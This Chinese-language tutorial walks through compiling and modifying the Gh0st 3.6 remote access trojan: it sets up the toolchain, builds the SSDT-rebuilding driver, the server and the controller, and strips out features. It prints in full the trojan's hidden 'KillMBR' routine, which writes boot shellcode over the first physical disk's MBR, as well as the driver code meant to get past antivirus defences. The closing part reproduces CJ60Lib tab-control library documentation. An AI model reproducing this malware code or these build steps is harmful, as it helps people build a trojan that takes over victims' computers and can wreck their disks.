lbear@lbear.tk
第1章 Gh0st的编译
第1节 环境搭建
Gh0st的开发环境是Visual C++ 6.0+sdk更新包+ddk2003。这个软件的代码是在08年被制作并开源的(所以要吐槽居然还在用vc6)。
首先Visual C++6网上一搜就有了,也不用我给链接。
其次是SDK更新,从http://www.ctdisk.com/file/770549可以找到,但我个人猜想也许安装VC6SP6就可以不需要这个更新。
最后是DDK2003,网上也搜得到,给个链接http://www.ctdisk.com/file/770607。(话说后面的VS9,10,11就不用这个东西,都整合在对应VS的安装包里面了(比如VS10里面是Windows SDK7.1,VS11里面是Windows SDK8.0),当然也可以单独安装这些SDK。补充一句,这个是用来编译驱动的。
接下来就要将SDK更新解压到VC6安装目录的对应文件夹并覆盖。
到此时,编译环境已经配置完成了。当然,你首先要有Ghost3.6 beta的源代码。
第2节 驱动的编译
先提一句和这个小结不太相关的:这里的这个驱动用途是重建SSDT表,感兴趣可以搜索”SSDT过主动”这一技术。不过由于这个技术出现了很久并曾经很广泛的使用,杀毒软件已经有了足够的防御能力。当然,人民群众的智慧是无穷的,特别是涉及到这么有成就感还有可能带来极大经济利益的事情的时候,杀毒软件和病毒的斗争总是在进行着的。
驱动的编译比较简单,在安装DDK2003之后,你可以在”开始菜单”|”程序”|”Development Kits”||Windows DDK 2600″|”Build Environments”找到”Windows XP Checked Build Environments”并打开。
接下来cd到源码中sys文件夹下,输入build即可。
之后将sys目录i386文件夹中RESSDT.sys复制到sys文件夹下,这个小节就完成了。
第3节 Svchost的编译
打开serversvchostsvchost.dsw,然后(使用release方式)编译。
第4节 Gh0st客户端程序的编译
打开gh0st目录的gh0st.dsw,编译即可。
第2章Gh0st的硬盘锁及驱动文件去除
第1节 Gh0st的硬盘锁
Gh0st的作者红狼为了防止有人篡改版权信息,加入这样一种保护机制:程序运行开始时检查版权信息,若不符,则将现有系统的MBR写掉,这样电脑再次重启的时候会不能开机。
第2节 在Ghost源码中去掉硬盘锁机制
在BuildView.cpp中去掉
char strVer[10];
char strTitle[10];
strVer[0] = ‘C’;
strVer[1] = ‘.’;
strVer[2] = ‘R’;
strVer[3] = ‘u’;
strVer[4] = ‘f’;
strVer[5] = ‘u’;
strVer[6] = ‘s’;
strVer[7] = ‘ ‘;
strVer[8] = ‘S’;
strVer[9] = ‘ ‘;
strTitle[0] = ‘G’;
strTitle[1] = ‘h’;
strTitle[2] = ‘0’;
strTitle[3] = ‘s’;
strTitle[4] = ‘t’;
strTitle[5] = ‘ ‘;
strTitle[6] = ‘R’;
strTitle[7] = ‘A’;
strTitle[8] = ‘T’;
strTitle[9] = ‘ ‘;
CString str;
GetDlgItemText(IDC_STATIC_VER, str);
if (str.Find(strVer) == -1)
((CGh0stApp *)AfxGetApp())->KillMBR();
GetParent()->GetWindowText(str);
if (str.Find(strTitle) == -1)
((CGh0stApp *)AfxGetApp())->KillMBR();
在gh0st.cpp去掉
// CGh0stApp message handlers
unsigned char scode[] =
“xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c”
“x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x76x69x72”
“x75x73x21x20x46x75x63x6bx20x79x6fx75x20x3ax2dx29”;
int CGh0stApp::KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) – 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
hDevice = CreateFile
(
“[url=].PHYSICALDRIVE0[/url]”,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
第3节 Gh0st硬盘锁中招的解决办法
一个解决办法是用修复MBR的软件,在PE环境下修复MBR,这样的软件中MbrFix是很方便的一款。
当然也可以用系统光盘引导,使用其中的”修复计算机”功能修复MBR。
第4节 Gh0st驱动文件的去除
Gh0st的重建SSDT表过主动防御的功能在当年可以说是无比拉风,但是四年之后的现在很多杀毒软件已经对此有了完善的应对机制,这个功能可以说是鸡肋的很,所以现在我们可以将其去除。
1、先搜索ResetSSDT,然后把搜索到的全注释掉 10处 这里要从根文件夹搜索
1-5 处 位置: Gh0st3.6原版Serverinstallinstall.cpp(439):bool ResetSSDT(HMODULE hModule)
/*
去除驱动文件 代理位置 1-5/10
开始位置
bool ResetSSDT(HMODULE hModule)
{
typedef bool (__stdcall * LPResetSSDT)();
bool bRet = true;
char strTmpPath[MAX_PATH];
char strDllPath[MAX_PATH];
GetTempPath(sizeof(strTmpPath), strTmpPath);
GetTempPath(sizeof(strDllPath), strDllPath);
wsprintf(strDllPath, “%s%d_ex.tmp”, strTmpPath, GetTickCount());
try
{
ReleaseResource(hModule, IDR_DLL, “BIN”, strDllPath, NULL);
HMODULE hDll = LoadLibrary(strDllPath);
if (hDll == NULL)
{
throw “”;
}
LPResetSSDT ResetSSDT = (LPResetSSDT)GetProcAddress(hDll, “ResetSSDT”);
if (ResetSSDT == NULL)
throw “”;
ResetSSDT();
FreeLibrary(hDll);
}catch(…)
{
bRet = false;
DeleteFile(strDllPath);
}
return bRet;
}
结束位置
*/
2、第 6/10处
Serverinstallinstall.cpp(581): ResetSSDT(hInstance);
// 除去 驱动文件 位置 6/10
// ResetSSDT(hInstance);
3、Gh0st3.6原版Serversvchostsvchost.cpp(11):#include “common/resetssdt.h”
//除去驱动代码位置 7/10
//#include “common/resetssdt.h”
4、Gh0st3.6原版Serversvchostsvchost.cpp(24):extern “C” __declspec(dllexport) bool ResetSSDT();
//除去驱动代码位置 8/10
//extern “C” __declspec(dllexport) bool ResetSSDT();
5、Gh0st3.6原版Serversvchostsvchost.cpp(83): ResetSSDT();
//除去驱动代码位置 9/10
// ResetSSDT();
6、Gh0st3.6原版Serversvchostsvchost.cpp(222):extern “C” __declspec(dllexport) bool ResetSSDT()
//除去驱动代码位置 10/10
/*
extern “C” __declspec(dllexport) bool ResetSSDT()
{
return RestoreSSDT(CKeyboardManager::g_hInstance);
}
*/
7、注释掉资源调用
搜这句话 IDR_SYS
位置 :Gh0st3.6原版Serversvchostsvchost.rc(29):IDR_SYS BIN DISCARDABLE “..sysRESSDT.sys”
//注释 驱动 资源文件
//IDR_SYS BIN DISCARDABLE “..sysRESSDT.sys”
再删除svchost files 工程中的 RESSDT.sys
8、在文件夹中的工程 中 搜索:resetssdt.h
删除!
第3章 Gh0st中的CJ60Lib库
第1节 CJ60Lib库简介
This release is the result of your comments, and suggestions. I received several suggestions and bug reports, which I believe most have been addressed and fixed with this release. Please remember there is not a “team” of developers maintaining this code, only I, and it is done in my spare time, so you can expect some bugs. If you have comments or suggestions, feel free to drop me a line at kstowell@codejockeys.com
The original library (MFCXLib) was renamed to CJ60Lib, in order to break any links that may have been established with any applications using the old library, and to establish a version control system. The library has the same functionality as the old one, however, there have been several enhancements for compatibility with Visual C++ 6.0.
Follow these steps to setup your application to use CJ60Lib MFC extension library:
In your project settings, select the General tab. Make sure that Microsoft Foundation Class is set to Use MFC in a shared DLL.
In your project settings, select the Link tab. Set the Category to Input, and add ../Lib to Additional Library Path.
While still in the Link tab, change Category to General. For Output Name (All Configurations), build to the ../Lib directory. This makes the execution and debugging easier, since both DLL and EXE are located in the same directory. An example of this would be: ../Lib/MyDemo.exe.
Select the C/C++ tab next. Change Category to Preprocessor, and add ../Include to Additional Include Directories.
The last step would be to add the following two lines of code to your StdAfx.h header file, which will import all exported classes, and grant access to your entire application:
#include <CJ60Lib.h>
In order to statically link to CJ60Lib, make the following changes:
In your project settings, select the General tab. Make sure that Microsoft Foundation Class is set to Use MFC in a static library.
You will need to copy the resources from the CJ60 library to your project. The easiest way to do this is to open the file CJ60Lib.rc, then drag and drop the resources into your project
This library was written for version 4.71 or later of comctl32.dll. If you have an older version, you can download the latest version from the Microsoft site. Follow this link if you have an older version of comctl32.dll. It is important to note that the library will not load if your comctl32.dll version is older than 4.71.
Build errors, what to do:
If you receive the following build error “#error : CJ60Lib requires a newer version of the SDK than you have!”, this means that you most likely are using Visual C++ 5, and either do not have the platform SDK installed, or you have an older version. You will need to download the latest version from Microsoft. To get it, follow this link.
If you receive the following build error ” Error: Can’t find file CJ60Libd.lib.” This means you haven’t built the library yet. YOU NEED TO BUILD the library first, this will generate the .lib and .dll files needed by the examples.
Disclaimer:
This source code in this library may be used in compiled form in any way you desire, Source file(s) may be redistributed unmodified by any means PROVIDING they are not sold for profit without the authors expressed written consent, and providing that this notice and the authors name and all copyright notices remain intact. If the source code is used in any commercial applications then a statement along the lines of:
“Portions Copyright © 1998-99 Kirk Stowell” must be included in the startup banner, “About” box or printed documentation. An email letting me know that you are using it would be nice as well. That’s not much to ask considering the amount of work that went into this. This software is provided “as is” without express or implied warranty. Use it at your own risk! The author accepts no liability for any damage/loss of business that this product may cause.
图1 CJ60Lib类继承派生示意图
第2节 Gh0st中使用CJ60Lib库所需要的文件
CustomTabCtrl.cpp
TabSDIFrameWnd.cpp
ThemeUtil.cpp
CustomTabCtrl.h
TabSDIFrameWnd.h
ThemeUtil.h
Tmschema.h
在MainFrm.h中#define CFrameWnd CTabSDIFrameWnd
可以看到TabSDIFrameWnd.h定义了一个AddWiew函数以添加选项卡。
第3节 Gh0st创建标签栏
在MainFrm.h和MainFrm.cpp
在MainFrm.cpp中OnCreate()中末尾
调用CCustomTabCtrl中Create()函数。
CCustomTabCtrl默认对象是m_wndTab即m_wndTab.Create().
对函数BOOL CCustomTabCtrl::Create(UINT dwStyle, const CRect &rect, CWnd *pParentWnd, UINT nID);
dwStyle means the visual style of the tabs,(例:WS_CHILD,表示选项卡有子窗口;WS_VISIBLE,表示选项卡可见;CTCS_AUTOHIDEBUTTONS,隐藏按键;CTCS_TOOLTIPS,表示有提示功能;CTCS_DRAGMOVE,表示可使用鼠标左键拖拽选项卡窗口里的对象;CTCS_LEFT个左对齐风格)
rect 选项卡按键位置
选项卡控件父窗口指针(在gh0st中应该是主窗口,”this”)
选项卡ID(随便给一个,比如IDC_TABCTRL(在TabSDIFrameWnd.h中有定义))
创建标签栏的同时可以捕捉异常
If(xxx) TRACE0(“Failed to xxxxxx”);
CCustomTabCtrl::SetDragCursors(HCURSOR hCursorMove, HCURSOR hCursorCopy);
用来设置鼠标拖拽时图标变化
CCustomTabCtrl::ModifyStyle()
用来定制控件风格
通过消息建立标签
消息响应机制:消息名,WPARAM(常代表控件id和鼠标位置),LPARAM(结构指针,类型句柄)
一个消息必须由一个窗口接收,通过窗口句柄指明。
在视图初始化函数通过一个消息调用创建选项卡的函数
#define WM_MYINITIALUPDATE (WM_USER+101)
在view类oninitialupdate中用
CWnd::PostMessage(UINT message,WPARAM wParam=0 , LPARAM lParam = 0);向客户端主窗口发送消息。
e.g. PostMessage(WM_MYINITIALUPDATE);
定义一个初始化控件的函数(在CGhostView类)
Afx_msg LRESULT(32位,消息响应、窗口处理函数返回值) OnMyInitialUpdate(WRPARM, LPARAM);(只声明类型也是可以的)